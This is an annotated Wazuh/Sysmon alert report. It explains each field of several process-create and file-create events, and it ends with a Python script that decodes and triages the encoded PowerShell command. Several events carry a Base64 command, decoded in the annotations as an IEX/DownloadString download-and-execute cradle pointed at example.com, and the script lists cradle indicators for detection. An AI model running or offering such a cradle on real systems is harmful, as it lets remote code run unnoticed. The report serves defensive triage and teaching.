data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:27.053 ProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00} ProcessId: 15812 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00} ParentProcessId: 14568 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Sysmon's rendered text for the event; every data.win.eventdata.* field below is parsed from it. It also shows the command line as Windows saw it: the doubled backslashes and \" in the eventdata fields are JSON escaping added on export, not part of the real command line. Keep this as the evidence copy.

data.win.eventdata.utcTime:  2025-04-24 22:55:27.053
When Sysmon saw the process start (UTC). Build the endpoint timeline from this field; the alert timestamp is when the Wazuh manager processed it, seconds later.

data.win.eventdata.processGuid:  {94294ddc-c15f-680a-cf0c-000000000e00}
Sysmon's unique ID for the new process. Unlike a PID it is never reused, so it is the join key to this process's later EID 11 (file create), EID 3 (network) and EID 22 (DNS) events, and it appears as ParentProcessGuid in anything it spawns.

data.win.eventdata.processId:  15812
PID of the new process. Fine for a quick look, but PIDs are recycled after exit; pivot on ProcessGuid for anything that matters.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable. This is the real Windows PowerShell 5.1 under System32; the same file name from any other path would be the first red flag.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version from the PE resource. 10.0.26100.x is the Windows 11 24H2 / Server 2025 code base, so the host is on a current build.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Trivial to forge, so use it for context only; the hash below proves authenticity, this string does not.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the same PE resource; same caveat as Description.

data.win.eventdata.company:  Microsoft Corporation
Company string from the same PE resource. A Microsoft name on a non-Microsoft path or hash is a lookalike.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name from the PE resource. Compare it with the file name in Image: OriginalFileName PowerShell.EXE under any other name (a copied and renamed binary) is a classic evasion.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The full command line, and the most important field here. -EncodedCommand takes Base64 of the UTF-16LE script text; this one decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle (fetch a script over HTTPS and run it in memory without touching disk). -NoLogo -NoProfile are typical of scripted, non-interactive launches. example.com is a reserved documentation domain, so this is most likely a test rather than live C2; in production the URL is the pivot into proxy and DNS logs. Note the executable path appears twice: the first token is the program, the second is its first argument, and every process in this chain carries exactly the same line.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process; here the user's profile root, inherited from the parent.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as (DOMAIN\user). The domain part equals the hostname, so Attcker1 is a local account, not a domain identity.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session; matches the Logon GUID in the Security 4624 event that created the session.

data.win.eventdata.logonId:  0x26584
Logon session ID; matches the Logon ID in the Security 4624 event. Every EID 1 on this page carries 0x26584, so the whole chain ran inside one logon session.

data.win.eventdata.terminalSessionId:  1
Windows session number. 1 is an interactive desktop session (console or RDP); 0 would be a service or other non-interactive launch.

data.win.eventdata.integrityLevel:  Medium
Medium = a standard, non-elevated token. Nothing here has bypassed UAC; if escalation is suspected, look for a later High or System process in the same chain.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file on disk, in the algorithms the Sysmon config requests (SHA256 only here). Check it against a known-good powershell.exe for this build, then pivot on it to find every other launch of the same binary; it is identical across all EID 1 events on this page.

data.win.eventdata.parentProcessGuid:  {94294ddc-c159-680a-cb0c-000000000e00}
GUID of the parent process. Search for an EID 1 with this value as ProcessGuid to see how the parent itself was started.

data.win.eventdata.parentProcessId:  14568
PID of the parent (14568). Chain so far: 14568 → 15812 (this process); 15812 is in turn the parent of PID 5124 in the next EID 1 alert on this page.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent: also powershell.exe. PowerShell spawning PowerShell is what rule 92057 keys on.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The parent's command line, captured when the parent started. It is identical to this process's, encoded command included: each PowerShell in this chain relaunches itself with the same arguments, which is why rule.firedtimes keeps climbing.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account of the parent. Same user, so no cross-account hand-off at this step.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:30.156+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:30.156+0000
When the Wazuh manager processed the alert. It trails the endpoint: data.win.eventdata.utcTime below is 22:55:27.733, about 2.4 s earlier. Build the endpoint timeline from utcTime and use this field only to order alerts on the manager.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). T1105 here is the rule author's mapping for "new file in a folder malware likes", not something the event proves: an EID 11 only says a file was created locally. Check the TargetFilename below before treating this as a tool transfer.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  118
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535330.2683975
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon: the event ID and eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the Sysmon ETW provider (fixed for every Sysmon install); useful when filtering raw EVTX or ETW exports.

data.win.system.eventID:  11
Sysmon event ID, not a Security-log ID: 11 = FileCreate. Other Sysmon IDs to know: 1 process create, 3 network connection, 7 image load, 8 remote thread, 10 process access, 13 registry value set, 22 DNS query.

data.win.system.version:  2
Schema version of this event type's template; it changes when Sysmon adds fields. Only matters for parser compatibility.

data.win.system.level:  4
ETW level: 4 = Informational (1 Critical, 2 Error, 3 Warning, 5 Verbose). Sysmon writes everything at level 4, so this carries no severity signal.

data.win.system.task:  11
Task category; for Sysmon it simply mirrors the event ID (11 = FileCreate).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:27.7747838Z
When the record was written to the log (ETW clock). Compare with eventdata.utcTime (when Sysmon observed the activity) and the Wazuh timestamp (when the manager processed it): three clocks, from milliseconds to seconds apart.

data.win.system.eventRecordID:  350118
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the record (3712 on every Sysmon event here), not the process the event describes; that one is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Same caveat as processID: it says nothing about the process under investigation.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational means the eventdata fields below follow Sysmon's schema.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch means a forwarded event or a mis-registered agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:27.733 ProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00} ProcessId: 15812 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bpcztlkl.1e1.ps1 CreationUtcTime: 2025-04-24 22:55:27.733 User: Attacker\Attcker1"
Sysmon's rendered text for the event; the eventdata fields below are parsed from it. Keep it as the evidence copy, it survives decoder changes.

data.win.eventdata.utcTime:  2025-04-24 22:55:27.733
When Sysmon saw the file being created (UTC): 0.68 s after PID 15812 started (its EID 1 UtcTime is 22:55:27.053), which fits a start-up side effect rather than something the fetched script did.

data.win.eventdata.processGuid:  {94294ddc-c15f-680a-cf0c-000000000e00}
GUID of the creating process. It equals the ProcessGuid of the EID 1 alert above (PID 15812, the encoded-command PowerShell), which attributes this file create to that launch with no PID guesswork.

data.win.eventdata.processId:  15812
PID of the creator; a convenience next to the GUID, and recycled after exit.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Process that created the file: powershell.exe itself, not a dropper, archiver or browser.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bpcztlkl.1e1.ps1
The created file, and the reason to downgrade this alert. __PSScriptPolicyTest_<random>.<random>.ps1 in %LOCALAPPDATA%\Temp is written by powershell.exe on every start-up to test whether AppLocker/WDAC script enforcement applies to it, and is normally deleted right after. It is a side effect of the PowerShell launch, not an attacker payload; rule 92213 matched on "script file in Temp" alone. The real evidence is the EID 1 above (the encoded download cradle); this EID 11 merely confirms one more PowerShell instance started. Expect one of these per process in the chain.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:27.733
File-system creation time of the file. Equal to UtcTime here, i.e. a brand-new file. If it were earlier than UtcTime the process overwrote a file that already existed; a later EID 2 on the same path would mean its timestamp was changed afterwards.

data.win.eventdata.user:  Attacker\\Attcker1
Account that created the file; the same local user as in the process events.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:33.440+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:33.440+0000
When the Wazuh manager processed the alert. It trails the endpoint: data.win.eventdata.utcTime below is 22:55:29.220, about 4.2 s earlier. Build the endpoint timeline from utcTime and use this field only to order alerts on the manager.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  115
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535333.2686744
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon: the event ID and eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the Sysmon ETW provider (fixed for every Sysmon install); useful when filtering raw EVTX or ETW exports.

data.win.system.eventID:  1
Sysmon event ID, not a Security-log ID: 1 = Process Create, Sysmon's richer counterpart of Security 4688 (adds hashes, process GUIDs, parent command line and parent user).

data.win.system.version:  5
Schema version of this event type's template; it changes when Sysmon adds fields (EID 1 version 5 is the one that carries ParentUser). Only matters for parser compatibility.

data.win.system.level:  4
ETW level: 4 = Informational (1 Critical, 2 Error, 3 Warning, 5 Verbose). Sysmon writes everything at level 4, so this carries no severity signal.

data.win.system.task:  1
Task category; for Sysmon it simply mirrors the event ID (1 = ProcessCreate).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:30.8278138Z
When the record was written to the log (ETW clock). Compare with eventdata.utcTime (when Sysmon observed the activity) and the Wazuh timestamp (when the manager processed it): three clocks, from milliseconds to seconds apart.

data.win.system.eventRecordID:  350142
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the record (3712 on every Sysmon event here), not the process the event describes; that one is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational means the eventdata fields below follow Sysmon's schema.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch means a forwarded event or a mis-registered agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:29.220 ProcessGuid: {94294ddc-c161-680a-d10c-000000000e00} ProcessId: 5124 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00} ParentProcessId: 15812 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Sysmon's rendered text for the event; every data.win.eventdata.* field below is parsed from it. It shows the command line as Windows saw it: the doubled backslashes and \" in the eventdata fields are JSON escaping added on export. Keep this as the evidence copy.

data.win.eventdata.utcTime:  2025-04-24 22:55:29.220
When Sysmon saw the process start (UTC). Build the endpoint timeline from this field; the alert timestamp is when the Wazuh manager processed it, seconds later.

data.win.eventdata.processGuid:  {94294ddc-c161-680a-d10c-000000000e00}
Sysmon's unique ID for the new process. Never reused, unlike a PID, so it is the join key to this process's later EID 11, EID 3 and EID 22 events, and it appears as ParentProcessGuid in anything it spawns (it does, in the next EID 1 alert).

data.win.eventdata.processId:  5124
PID of the new process (5124). Fine for a quick look, but PIDs are recycled after exit; pivot on ProcessGuid for anything that matters.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable. This is the real Windows PowerShell 5.1 under System32; the same file name from any other path would be the first red flag.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version from the PE resource. 10.0.26100.x is the Windows 11 24H2 / Server 2025 code base.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Trivial to forge; the hash below proves authenticity, this string does not.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the same PE resource; same caveat as Description.

data.win.eventdata.company:  Microsoft Corporation
Company string from the same PE resource. A Microsoft name on a non-Microsoft path or hash is a lookalike.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name from the PE resource. Compare it with the file name in Image: OriginalFileName PowerShell.EXE under any other name is a renamed-binary evasion.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The full command line. -EncodedCommand takes Base64 of the UTF-16LE script text; this one decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle (fetch a script over HTTPS and run it in memory). -NoLogo -NoProfile are typical of scripted, non-interactive launches. example.com is a reserved documentation domain, so this is most likely a test rather than live C2; in production the URL is the pivot into proxy and DNS logs. The executable path appears twice: the first token is the program, the second is its first argument, and every process in this chain carries exactly the same line.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process; the user's profile root, inherited from the parent.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as (DOMAIN\user). The domain part equals the hostname, so Attcker1 is a local account.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session; matches the Logon GUID in the Security 4624 event that created it.

data.win.eventdata.logonId:  0x26584
Logon session ID; matches the Logon ID in Security 4624. The same 0x26584 as the previous EID 1, so still one logon session.

data.win.eventdata.terminalSessionId:  1
Windows session number. 1 is an interactive desktop session (console or RDP); 0 would be a service or other non-interactive launch.

data.win.eventdata.integrityLevel:  Medium
Medium = a standard, non-elevated token. Nothing in this chain has bypassed UAC so far.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file on disk (SHA256 only, per the Sysmon config). Identical to the previous EID 1, so the same binary; verify it once against a known-good powershell.exe for this build and pivot on it for every other launch.

data.win.eventdata.parentProcessGuid:  {94294ddc-c15f-680a-cf0c-000000000e00}
GUID of the parent process. It is the ProcessGuid of the previous EID 1 alert (PID 15812), which ties the two alerts together regardless of PID reuse.

data.win.eventdata.parentProcessId:  15812
PID of the parent (15812). Chain so far: 14568 → 15812 → 5124 (this process); 5124 is in turn the parent of PID 7424 in the next EID 1 alert on this page.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent: also powershell.exe. PowerShell spawning PowerShell is what rule 92057 keys on.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The parent's command line, captured when the parent started. Identical to this process's, encoded command included: each PowerShell in this chain relaunches itself with the same arguments, which is why rule.firedtimes keeps climbing.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account of the parent. Same user, so no cross-account hand-off at this step.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
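The -EncodedCommand argument is the only place in these EID 1 alerts where the launched script is visible, and the report leaves it undecoded. The block below is an added example written for this report, not SOCscribe or Wazuh code: it pulls the Base64 out of the alert's commandLine field (SAMPLE_COMMANDLINE is copied from the alerts above as a constructed sample), decodes it as UTF-16LE the way powershell.exe does, flags download-cradle indicators in the result, and checks the PowerShell-spawns-PowerShell relationship that rule 92057 keys on. The INDICATORS list, the switch-prefix handling and the result keys are this example's own assumptions, not a Wazuh rule.

```python
"""Decode and triage the -EncodedCommand of a Sysmon EID 1 command line.

Added example for this report, not SOCscribe or Wazuh code. SAMPLE_COMMANDLINE
is copied from data.win.eventdata.commandLine of the EID 1 alerts on this page
(a constructed sample); INDICATORS, the result keys and the verdict logic are
this example's own assumptions, not a Wazuh rule.
"""
import base64
import binascii
import re

SAMPLE_COMMANDLINE = (
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)
# Parent fields from the same alert: the parent is powershell.exe with the identical line.
SAMPLE_PARENT_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PARENT_COMMANDLINE = SAMPLE_COMMANDLINE

# Matched against the decoded script text (assumption: a minimal cradle-oriented list).
INDICATORS = {
    "invoke-expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download-cradle": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
        r"|invoke-restmethod|start-bitstransfer", re.I),
}
URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.I)
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # a quoted token or a bare word, Windows style


def tokenize(commandline):
    """Split a Windows command line into tokens, dropping the quotes around quoted ones."""
    toks = TOKEN_RE.findall(commandline)
    return [t[1:-1] if len(t) >= 2 and t[0] == '"' and t[-1] == '"' else t for t in toks]


def find_encoded_command(commandline):
    """Return the Base64 operand of -EncodedCommand, or None if the switch is absent.

    powershell.exe accepts any prefix of the switch name (-e, -en, -enc, ...) and the
    documented alias -ec, case-insensitively, introduced by - or /."""
    tokens = tokenize(commandline)
    for i, tok in enumerate(tokens[:-1]):
        if not tok or tok[0] not in "-/":
            continue
        flag = tok[1:].lower()
        if flag in ("e", "ec") or (flag and "encodedcommand".startswith(flag)):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64):
    """-EncodedCommand carries Base64 of the UTF-16LE script; return the text, or None if it is not that."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or len(raw) % 2:  # UTF-16 is two bytes per code unit
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def triage(commandline, parent_image, parent_commandline):
    """Summarise one EID 1: decoded script, indicator hits, URLs, and whether PowerShell relaunched itself."""
    b64 = find_encoded_command(commandline)
    decoded = decode_encoded_command(b64) if b64 is not None else None
    text = decoded or ""
    tokens = tokenize(commandline)
    child_exe = tokens[0].rsplit("\\", 1)[-1].lower() if tokens else ""
    parent_exe = parent_image.rsplit("\\", 1)[-1].lower()
    return {
        "encoded": b64 is not None,
        "decoded": decoded,
        "indicators": sorted(name for name, rx in INDICATORS.items() if rx.search(text)),
        "urls": URL_RE.findall(text),
        # rule 92057's condition, plus the stronger "identical arguments" check seen on this page
        "self_spawn": (child_exe == parent_exe == "powershell.exe"
                       and commandline.lower() == parent_commandline.lower()),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_COMMANDLINE, SAMPLE_PARENT_IMAGE, SAMPLE_PARENT_COMMANDLINE).items():
        print(f"{key}: {value}")
```

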